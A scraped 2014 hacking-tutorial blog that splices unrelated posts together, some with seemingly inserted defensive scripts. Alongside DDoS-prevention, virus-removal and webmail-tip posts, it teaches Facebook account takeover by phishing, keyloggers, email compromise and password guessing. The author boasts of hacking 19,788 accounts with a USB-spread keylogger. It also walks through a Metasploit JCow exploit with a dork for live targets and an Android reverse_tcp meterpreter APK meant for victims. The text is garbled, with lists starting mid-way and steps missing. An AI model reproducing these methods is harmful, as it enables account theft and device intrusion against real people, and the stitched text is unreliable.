Tuesday, June 3, 2014

Distributed denial-of-service (DDoS) attacks are regularly in the headlines worldwide, as they plague the websites of banks and of almost every organization with a prominent online presence. The main reason DDoS attacks have proliferated is that the attacker incurs very little cost to set one in motion. Fortunately, various prevention methods have been developed to tackle such attacks. Before delving into the ways to prevent a DDoS attack, let's first understand what exactly a DDoS attack is.

Understanding a DDoS Attack

A DDoS (distributed denial-of-service) attack is an attempt by attackers to make a computer's resources inaccessible to its intended users. To carry out a DDoS attack, attackers never use their own systems; rather, they build a network of zombie computers, often called a "botnet" (a hive of computers), to incapacitate a website or web server.

Here is the basic idea. The attacker instructs all the computers in the botnet to contact a particular site or web server, again and again. This increases traffic on the network, which slows the site down for its intended users. At times the traffic can be so high that it takes the site down completely.

3 Basic Tips to Prevent a DDoS Attack

There are several ways to prevent a DDoS attack; in this guest post I'll cover three basic tips that will help you protect your website from one.

1. Buy More Bandwidth.

One of the easiest methods is to ensure that you have sufficient bandwidth for your website. You can handle many low-scale DDoS attacks simply by buying more bandwidth to service the requests. How does it help? Distributed denial of service is nothing more than a game of capacity. Suppose 10,000 computer systems each send 1 Mbps your way. This means 10 GB of data is hitting your web server every second. That is a lot of traffic!

To avoid this problem, apply the same rule you would use for normal redundancy: if you want more web servers, spread them across diverse datacenters and use load balancing. Spreading your traffic across several servers helps balance the load and will most likely give you enough headroom to handle a sustained increase in traffic.

However, this method has a problem: buying more bandwidth can be costly. Current DDoS attacks are getting larger, and can grow well beyond what your budget can cover.

2. Opt for DDoS Mitigation Services.

Many network or Internet service providers offer DDoS mitigation capabilities. Look for a provider with the largest DDoS protection and mitigation network, automated tools, and a pool of skilled anti-DDoS technicians with the wherewithal to act in real time as the attack's characteristics change. A viable alternative is a DDoS prevention appliance, which is specifically designed to detect and prevent distributed denial-of-service attacks.

3. Restricted Connectivity.

If you have computer systems connected directly to the web, properly install and configure your routers and firewall to limit connectivity. For instance, when receiving data from a client machine, you can have the firewall allow traffic from that machine only on a few chosen ports (such as HTTP, POP, SMTP).
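One way to check that a host really exposes only the chosen ports is to compare its listening sockets with the allowlist. The script below is an added example, not part of the original post; the `ss -tlnH` sample is constructed, and the port numbers 80, 110 and 25 are the standard ports for the services the post names.

```python
import ipaddress

# Allowlist from the paragraph above: HTTP, POP (POP3) and SMTP on their standard ports.
ALLOWED_PORTS = {80: "HTTP", 110: "POP3", 25: "SMTP"}

# Constructed sample of `ss -tlnH` output (listening TCP sockets, numeric, no header).
SAMPLE_SS_OUTPUT = """\
LISTEN 0      511          0.0.0.0:80         0.0.0.0:*
LISTEN 0      100          0.0.0.0:25         0.0.0.0:*
LISTEN 0      100          0.0.0.0:110        0.0.0.0:*
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
LISTEN 0      80         127.0.0.1:3306       0.0.0.0:*
LISTEN 0      128             [::]:8080          [::]:*
LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*
"""


def parse_listeners(ss_output):
    """Yield (address, port) for every LISTEN line of `ss -tln` output."""
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue  # header, blank or non-listening line
        host, _, port = fields[3].rpartition(":")
        # Drop IPv6 brackets and a trailing %interface scope.
        host = host.strip("[]").split("%", 1)[0]
        yield host, int(port)


def is_loopback(host):
    """Loopback-only listeners are not reachable from the network."""
    if host == "*":  # ss prints "*" for a dual-stack wildcard bind
        return False
    return ipaddress.ip_address(host).is_loopback


def audit(ss_output, allowed=ALLOWED_PORTS):
    """Return network-reachable listeners whose port is not on the allowlist."""
    findings = []
    for host, port in parse_listeners(ss_output):
        if not is_loopback(host) and port not in allowed:
            findings.append((host, port))
    return sorted(findings, key=lambda item: item[1])


if __name__ == "__main__":
    for host, port in audit(SAMPLE_SS_OUTPUT):
        print(f"listener outside allowlist: {host} port {port}")
```

Anything the audit reports should either be closed, bound to loopback, or blocked at the firewall.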

Wrapping Up!

Websites are attacked by hackers every second. Denial-of-service attacks are growing enormously and creating a lot of problems for business organizations with a strong online presence. In this guest post you have learned what a DDoS attack actually is and a few methods to prevent one. The three tips above are the ones I recommend you run through to at least understand where to start in building a resilient web network with a chance of surviving a DDoS attack.

Hi friends, I have already posted two posts on how to hack a Facebook account password, the first using keyloggers and the other using phishing. Today I am going to reveal all the methods that can be used to hack a Facebook account password.

Today I will cover all 4 ways to hack a Facebook account password that hackers usually use to hack your Facebook account.

3. By hacking the primary email address that the user used to create the Facebook account.

4. Social engineering, or simply guessing your friend's password.

Facebook Phishing Attack:

I am explaining this method first because it's the easiest and also the most popular method for hacking Facebook passwords. You can also search Google for the various famous Facebook hacking methods and you will always find the phishing technique at the top. I am explaining the methods in order of their popularity.

Now you want to know which is my favorite method for hacking Facebook account passwords, and I will undoubtedly tell you it's simply PHISHING.


Hacking Facebook account password remotely using Keyloggers and RATs

Aaw... Best method for advanced hackers, and my second favorite too. Its popularity is a little lower than phishing only because it involves downloading a hack tool, then creating your keylogger and sending it to the victim, which is a lengthy process and also insecure, as you are not aware whether the keylogger you are downloading itself contains some spyware or simply a keylogger attached to it. Keylogging becomes easier if you have physical access to the victim's computer, as the only thing you have to do is install a keylogger and direct it to your destination so that it sends all recorded keystrokes to that destination. A keylogger records the keystrokes into a log file, and these logs can then be used to get the required Facebook password.


Hacking the Primary Email address

If a Facebook hacker, or a keylogger, by some means compromises the Gmail or Yahoo account you use as your primary email address, the attacker can easily take over your Facebook password using the "Forgot password" trick. The hacker simply asks Facebook to send the password reset email to your primary email address, which is already hacked. Thus your Facebook account password will be reset and the account will be hacked as well! So always remember to protect the primary email address that you used to create your Facebook account, and try to keep an unknown or otherwise unused mail ID as your primary email address in Facebook.

Social Engineering or Guessing Passwords

This method sounds like it would not work at the beginning. Even I neglected it for a long time. But once I thought of using it against my friend on Facebook, and amazingly I guessed his Facebook password very easily by this method. I think many of you already know what social engineering is. For novice hackers: social engineering is a method of retrieving or guessing the password, or the answer to a security question, simply by obtaining some information about the victim, or by gathering it from his own Facebook and other social networking profiles, where most users provide their critical information just for fashion without knowing the consequences. You have to be very careful while using this, as the victim must not become aware of your intention. Just ask him cautiously, using your logic.

Some common passwords that you can try on your friends are:

1. Their mobile number, or their girlfriend's or boyfriend's mobile number (always try his previous or old mobile number, as they are not as much of a fool as they appear).

2. Their girlfriend's or boyfriend's name, or their own name concatenated with their girlfriend's or boyfriend's name.

3. Dates of birth.

4. Their favorite movie names, cartoon character names or favorite music band names, or simply hero names like Batman, Dark Knight, Superman, Godzilla, Spartacus and many more.

5. Most important: most websites now require that passwords be alphanumeric, so users just add 1, 2, 3 to their normal passwords, and some smarter guys add !, @, # to their passwords, amazingly all in sequence.

Note: the above common passwords are not from any internet resource; they come from my own case study, a conclusion I reached after hacking 19,788 email accounts. I know you now want to know how I hacked so many accounts. As I have already mentioned, for advanced hackers the second option is best, and the only thing I did was make my keylogger spreadable via USB and pen drives. Whoever used the infected USB drive also got infected, and so the procedure went on. In the end my 10Gb of free storage was filled, and I don't have enough time to clean it regularly.
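The five patterns listed above are exactly what a site can refuse when a user sets a password. The check below is an added example, not code from the original post; the profile fields, sample values and function names are hypothetical, and it generalizes "name plus name" to any concatenation of the user's own details.

```python
import re
from datetime import date

# Trailing "1,2,3" / "!,@,#" runs that the post says users append in sequence.
SEQ_SUFFIX = re.compile(r"(?:123|12|1|!@#|!@|!)+$")

ONLY_PERSONAL = "made only of personal details"
PERSONAL_PLUS_SUFFIX = "personal details plus a 123 / !@# style suffix"

# Constructed sample profile (hypothetical user, not real data).
SAMPLE_PROFILE = {
    "names": ["Ravi", "Anita"],              # the user and their partner
    "phones": ["+91 98765 43210"],           # current and old numbers go here
    "birth_date": date(1992, 4, 17),
    "favourites": ["Batman", "Dark Knight"],
}


def personal_tokens(profile):
    """Collect the lower-cased strings an acquaintance could guess from the profile."""
    tokens = set()
    for word in profile.get("names", []) + profile.get("favourites", []):
        tokens.add(re.sub(r"[^a-z0-9]", "", word.lower()))
    for phone in profile.get("phones", []):
        digits = re.sub(r"\D", "", phone)
        tokens.update({digits, digits[-10:]})  # assumption: 10-digit national number
    dob = profile.get("birth_date")
    if dob:
        for fmt in ("%d%m%Y", "%m%d%Y", "%Y%m%d", "%d%m%y", "%m%d%y", "%Y"):
            tokens.add(dob.strftime(fmt))
    tokens.discard("")
    return tokens


def built_only_from(text, tokens):
    """True if text can be split completely into tokens (word-break DP)."""
    reachable = [True] + [False] * len(text)
    for end in range(1, len(text) + 1):
        reachable[end] = any(
            len(tok) <= end and reachable[end - len(tok)] and text.endswith(tok, 0, end)
            for tok in tokens
        )
    return reachable[len(text)]


def check_password(password, profile):
    """Return a list of reasons to reject the password; empty means it passed."""
    tokens = personal_tokens(profile)
    raw = re.sub(r"[\s._/-]", "", password.lower())  # ignore separators
    core = SEQ_SUFFIX.sub("", raw)                    # drop 123 / !@# padding
    if raw and built_only_from(raw, tokens):
        return [ONLY_PERSONAL]
    if core and core != raw and built_only_from(core, tokens):
        return [PERSONAL_PLUS_SUFFIX]
    return []


if __name__ == "__main__":
    for candidate in ("Batman123", "ravianita!@#", "17-04-1992", "tq8#Lm2vPz"):
        print(candidate, "->", check_password(candidate, SAMPLE_PROFILE) or "ok")
```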

Dear readers, today I am going to tell you how to remove a virus using Command Prompt.

A virus is a computer program that can copy itself and infect your computer. Viruses can spread via USB/flash drives or from one computer to another by a few lines of code. There are many antivirus programs available to remove viruses from a computer, but there are some viruses or suspicious files which can't be removed by any antivirus software.

Some suspicious files, such as autorun.inf, initiate all the viruses on a PC. These files must be removed for the safe operation of your PC, because they may lead to data loss, software damage, etc. Such viruses and files can be removed using cmd. In this article we will discuss how to remove a virus using Command Prompt. The following steps can be used to remove a virus from your computer using Command Prompt.

Go to the Start menu and type "cmd" in the search box, or go to Start > All Programs > Accessories > Command Prompt.

Switch to the infected drive; for example, type g: to go to the G drive.

Now type dir/w/a. It will show all the files on the drive, including hidden files.

Locate AUTORUN.INF or any virus and other suspicious files in the directory.

There was no virus on my drive, so only autorun.inf has been highlighted.
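Once an autorun.inf has been located, the useful question is which program it would start, because that file needs attention too. The parser below is an added example, not part of the original article; the sample file content is constructed, and it reads the `open`, `shellexecute` and `shell\<verb>\command` entries of the `[autorun]` section.

```python
import configparser

# Entries of the [autorun] section that name something to run.
LAUNCH_KEYS = ("open", "shellexecute")

# Constructed sample, including stray lines that a strict INI parser would reject.
SAMPLE_AUTORUN = r"""; constructed sample, not taken from a real drive
stray text before any section
[AutoRun]
open=tools\launcher.exe /quiet
icon=tools\drive.ico
action=Open folder to view files
shell\open\command=tools\launcher.exe
   shellexecute = readme.html
another stray line
"""


def is_launch_key(key):
    """True for open=, shellexecute= and shell\\<verb>\\command= entries."""
    return key in LAUNCH_KEYS or (
        key.startswith("shell\\") and key.endswith("\\command")
    )


def autorun_launch_targets(text):
    """Return {key: command} for every entry in [autorun] that starts a program."""
    parser = configparser.ConfigParser(
        interpolation=None,    # keep % characters such as %SystemRoot% literal
        strict=False,          # tolerate duplicate sections and keys
        allow_no_value=True,   # tolerate stray lines without "="
        delimiters=("=",),     # ":" appears in drive letters, so it is not a delimiter
    )
    # Strip indentation so stray lines are not merged into the previous value,
    # and add a dummy section so text before [autorun] does not abort parsing.
    cleaned = "\n".join(line.strip() for line in text.splitlines())
    parser.read_string("[__preamble__]\n" + cleaned)

    targets = {}
    for section in parser.sections():
        if section.strip().lower() != "autorun":  # section names vary in case
            continue
        for key, value in parser.items(section):
            if value and is_launch_key(key):
                targets[key] = value
    return targets


if __name__ == "__main__":
    for key, command in autorun_launch_targets(SAMPLE_AUTORUN).items():
        print(f"{key} -> {command}")
```

Each path it reports is relative to the root of the drive that holds the autorun.inf.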

Thursday, April 17, 2014

Level: Medium
Victim server: Windows XP SP3
Victim vulnerable application: JCow 4.2
Attacker O.S.: Backtrack 5 R1

It has been a very long time since I wrote about hacking a web server. Today, while surfing around "again", I found that the Jcow social networking engine can be exploited, and the exploit ranking is marked as "excellent".

So what actually happens when you run this vulnerable Jcow version? Simply put, the attacker can go through your web server directory and do anything there. For example, if you host the vulnerable Jcow version (on insecure hosting, too), your web server directory can be owned.

In this example, let's say I have a vulnerable Jcow web server at IP address 192.168.8.94. Actually it's better to try installing your own web server, but if you want to find Jcow in the wild you can search with the Google dork "intext:Powered by Jcow 4.2.0" and register as a normal user there. In this tutorial I have already registered with username victim and password victim.

Okay, I hope you understand what I said above. To make it more realistic, let's try the tutorial…

Requirement :

1. Copy the downloaded jcow.rb exploit from the download link above into the /pentest/exploits/framework/modules/exploits/remote/ folder (see the command below).

cp jcow.rb /pentest/exploits/framework/modules/exploits/remote/

The text "framework" is in blue because I'm using Backtrack 5 R1 with Metasploit v4.0.1; the name depends on your Metasploit version, so on your computer it may be "framework3", "framework2" and so on.

If you don't know how to copy the jcow.rb file into your Backtrack, please refer to this tutorial about Linux folder sharing.

2. Open your Metasploit console and then use the exploit you just added.

msf > use exploit/remote/jcow

3. Next, view the available options for this exploit by running the show options command, and then configure them (see the box in red).

Information:
Set uri can be used if Jcow was not installed in the web server's main directory, for example http://web-server.com/jcow.

4. After everything has been set up successfully, the next thing to do is run the exploit using the exploit command.
Logon to http://onlinehackingtutorials.blogspot.in/
@ Copyright 2014 Pradeep Lodhi (Software Developer)

Nowadays the number of mobile users is increasing day by day, and the security threat is increasing along with it. Today's tutorial is Hacking Android Smartphone Tutorial using Metasploit. Why did we choose Android phones for this tutorial? Simply because Android phones have lately been growing very fast worldwide. Here in China you can get an Android phone for only US$ 30, which is one of the reasons Android is growing fast.

See more at:
http://www.hacking-tutorial.com/hacking-tutorial/hacking-android-smartphone-tutorial-using-metasploit/#sthash.cAfknmPn.dpuf


Android is an operating system based on the Linux kernel, and designed
primarily for touchscreen mobile devices such as smartphones and tablet
computers. Initially developed by Android, Inc., which Google backed
financially and later bought in 2005, Android was unveiled in 2007 along
with the founding of the Open Handset Alliance: a consortium of
hardware, software, and telecommunication companies devoted to advancing
open standards for mobile devices.

And what is an APK? According to Wikipedia:

Android application package file (APK) is the file format used to
distribute and install application software and middleware onto Google's
Android operating system; very similar to an MSI package in Windows or a
Deb package in Debian-based operating systems like Ubuntu.

As described above, the attacker's IP address is 192.168.8.94; below is our screenshot when the command was executed.

3. Because our payload is reverse_tcp, where the attacker expects the victim to connect back to the attacker's machine, the attacker needs to set up the handler to handle incoming connections on the port already specified above. Type msfconsole to go to the Metasploit console.

Info:

use exploit/multi/handler –> we will use the Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same as in step 2

4. Next we need to configure the options for the Metasploit payload we already specified in step 3.

Info:

5. The attacker already has the APK file and now he will start distributing it (I don't need to describe how to distribute this file; the internet is a good place for distribution).

6. Long story short, the victim (me myself) downloads the malicious APK file and installs it. After the victim opens the application, the attacker's Metasploit console gets something like this:

7. This means that the attacker is already inside the victim's Android smartphone and can do anything with the victim's phone.


Saturday, April 12, 2014

If you have been using Yahoo Mail and find yourself looking for some tips and tricks, here is a collection of tips, tricks and hacks for Yahoo Mail. Check out the latest episode of Upgrade Your Life on Yahoo! and manage your e-mails with the latest Easter eggs.

Yahoo! Tips Tricks and Hacks:

Trick: Instant Address Book Add - Drag a message onto the Contacts link and you'll see the icon change to a plus sign, which means you can add that contact to your address book in one easy step.

Trick: Navigate your inbox the quick way - Ctrl + Shift + Up Arrow or Down Arrow lets you jump to messages in the same folder that have the same subject line. Ctrl + Shift + Alt + Up Arrow lets you choose another factor to filter on (such as flag) when using Ctrl + Shift to navigate.

Easter Egg: When composing a message, just hit the Subject: button to cycle through a collection of random (often humorous) subject lines. A lot of real gems in here, including:
* The brain has been polished professor.
* All your platypus are belong to us.
* I believe those were mouse droppings.
* The twins just turned 2 and 4 this month!
* How about never? Is never good for you?
* Care for a foam apple?

Hack: Organize your inbox via Message Finder - Now it is as easy as typing in a search, ordering the results by Contact, Location, or Subject, selecting the messages, and dragging them to a new folder. Sounds complicated? It isn't; just do a search and then start dragging and dropping messages.

Tip: Select Multiple Messages - Hold Shift after selecting a message to select multiple messages. Hold Ctrl to add specific messages to the list. Hit Ctrl-A to select all messages in a folder or search results. This is a great way to select everything in your inbox and move it to an archive folder.

Tip: Read Messages Now - Set messages to be read as soon as you click on them. Go to the Options link in the upper right-hand corner and then select Mail Options. Find the item labeled "mark messages as read" and select "immediately". This way, when you scroll through messages, you no longer have to pause on each one to have it marked as read.

Tip: Hide/Show Viewing Pane - Just hit the letter V on your keyboard to have more space to organize your folder. Hit V again to reopen the message preview.

Tip: Quick Compose - Type the letter N to start a new message or R to reply to a selected message.

Trick: Find Text within your message - Hit Ctrl + F after selecting a message to find text within that message. Hitting the Enter key lets you scroll through each instance of the word within the message.

Trick: Scroll through folder without reading - Holding Ctrl lets you scroll through a folder's messages using the arrow keys without selecting each individual message.

Tip: Send Message Now - By using Ctrl + Enter you can send a message you are composing instantly. No more hunting for the send button.

That's it! There are quite a few more shortcuts documented in the help section, but these are the ones I've found most valuable. Leave a comment and share your Yahoo Mail tips.

GMAIL

Gmail is a free, advertising-supported email service provided by Google. Users may access Gmail as secure webmail, as well as via POP3 or IMAP4 protocols. Gmail initially started as an invitation-only beta release on April 1, 2004 and it became available to the general public on February 7, 2007, though still in beta status at that time. The service was upgraded from beta status on July 7, 2009, along with the rest of the Google Apps suite.

With an initial storage capacity offer of 1 GB per user, Gmail significantly increased the webmail standard for free storage from the 2 to 4 MB its competitors such as Hotmail offered at that time. Individual Gmail messages, including attachments, may be up to 25 MB. Gmail has a search-oriented interface and a "conversation view" similar to an Internet forum. Gmail is noted by web developers for its pioneering use of Ajax. Gmail runs on Google GFE/2.0 on Linux. As of June 2012, it is the most widely used web-based email provider with over 425 million active users worldwide.

Amazing Gmail secret trick

Did you know? You can create multiple user accounts (IDs) on a website with a single Gmail ID. The trick is to use only one Gmail account, or Gmail ID, and create many different accounts. Almost no website allows you to create more than one account associated with the same email ID; it would be quite a chaotic situation if this were possible on every website. With Gmail, creating multiple accounts on a single website is possible.

How to create many accounts on a website with a single email ID?

It's possible because Gmail does not count dots (.) in email addresses. Example: xyz@gmail.com and x.yz@gmail.com are the same email address.

This simply means that if you send email to x.yz@gmail.com, it will go to xyz@gmail.com. So if you already have an account on a website with xyz@gmail.com, you can create another account by registering with x.yz@gmail.com.

Similarly, you can imagine how many accounts you would be able to create on the same website using a single email ID, and a Gmail one at that.

Note: 90% of websites, including Twitter, will allow you to sign up this way with your single Gmail ID. But Facebook is among the other 10% of websites; it won't allow this even if you use a dot. Hope you enjoyed the trick.
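A site that wants one account per mailbox has to compare addresses in canonical form rather than as typed. The sketch below is an added example, not from the original post; the function names and sample addresses are constructed, and it goes beyond the dot rule above to also fold Gmail's `+tag` suffix and the googlemail.com alias domain.

```python
from collections import defaultdict

# Domains that deliver to the same Gmail mailbox.
GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}

# Constructed sign-up attempts.
SAMPLE_SIGNUPS = [
    "xyz@gmail.com",
    "x.yz@gmail.com",
    "X.Y.Z@GMAIL.com",
    "xyz+news@googlemail.com",
    "x.yz@example.org",
    "xyz@example.org",
]


def canonical_email(address):
    """Return the form of the address to use as the uniqueness key at sign-up."""
    local, sep, domain = address.strip().rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an email address: {address!r}")
    domain = domain.lower()
    if domain in GMAIL_DOMAINS:
        # Gmail ignores case, dots, and anything from the first "+" onwards.
        local = local.lower().split("+", 1)[0].replace(".", "")
        if not local:
            raise ValueError(f"empty Gmail mailbox name: {address!r}")
        domain = "gmail.com"
    # Other providers may treat dots as significant, so leave them untouched.
    return f"{local}@{domain}"


def find_alias_groups(addresses):
    """Group addresses that reach the same mailbox; return groups with 2+ members."""
    groups = defaultdict(list)
    for address in addresses:
        groups[canonical_email(address)].append(address)
    return {key: members for key, members in groups.items() if len(members) > 1}


class SignupRegistry:
    """Minimal in-memory registry that refuses a second account per mailbox."""

    def __init__(self):
        self._owner = {}

    def register(self, address):
        key = canonical_email(address)
        if key in self._owner:
            return False, self._owner[key]  # already registered under this address
        self._owner[key] = address
        return True, address


if __name__ == "__main__":
    registry = SignupRegistry()
    for attempt in SAMPLE_SIGNUPS:
        accepted, owner = registry.register(attempt)
        print(f"{attempt:28} {'accepted' if accepted else 'duplicate of ' + owner}")
```

Store the canonical form only as the uniqueness key and keep sending mail to the address the user typed.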

Facebook Password Hack

Many of you asked me to post an easy prank to hack a Facebook password which doesn't require any phishing, keylogger or any other difficult method. So here I go with this amazing trick for all you guys to hack any Facebook password. This Facebook hack trick will only work when the user has not logged in and is using Chrome.

Just follow the simple steps mentioned below to know the password of your Facebook friend:

Note: This prank works only when your Facebook friend has entered their username and password, and the password is visible to you only as asterisks, while they are using the Google Chrome browser.

Step 1: Open the Google Chrome tab where your friend has entered their username and password, but the password is visible only as asterisks (******).

Step 2: Now open the console window by pressing CTRL + SHIFT + J.

Step 3: Copy the given code by selecting it and pressing CTRL + C.

Ankit Fadia Hacking Tricks | Free Ebook Download


Assessing Server Security - State of the Art. The talk takes into consideration the progress that has been made in web server security over the last few years, and the progress that has been made in attacking web servers over the same time. The paper visits the new vulnerabilities introduced by web applications and discusses the thinking applied to discover such vulnerabilities. It finally describes the state of the art of web server scanning technology.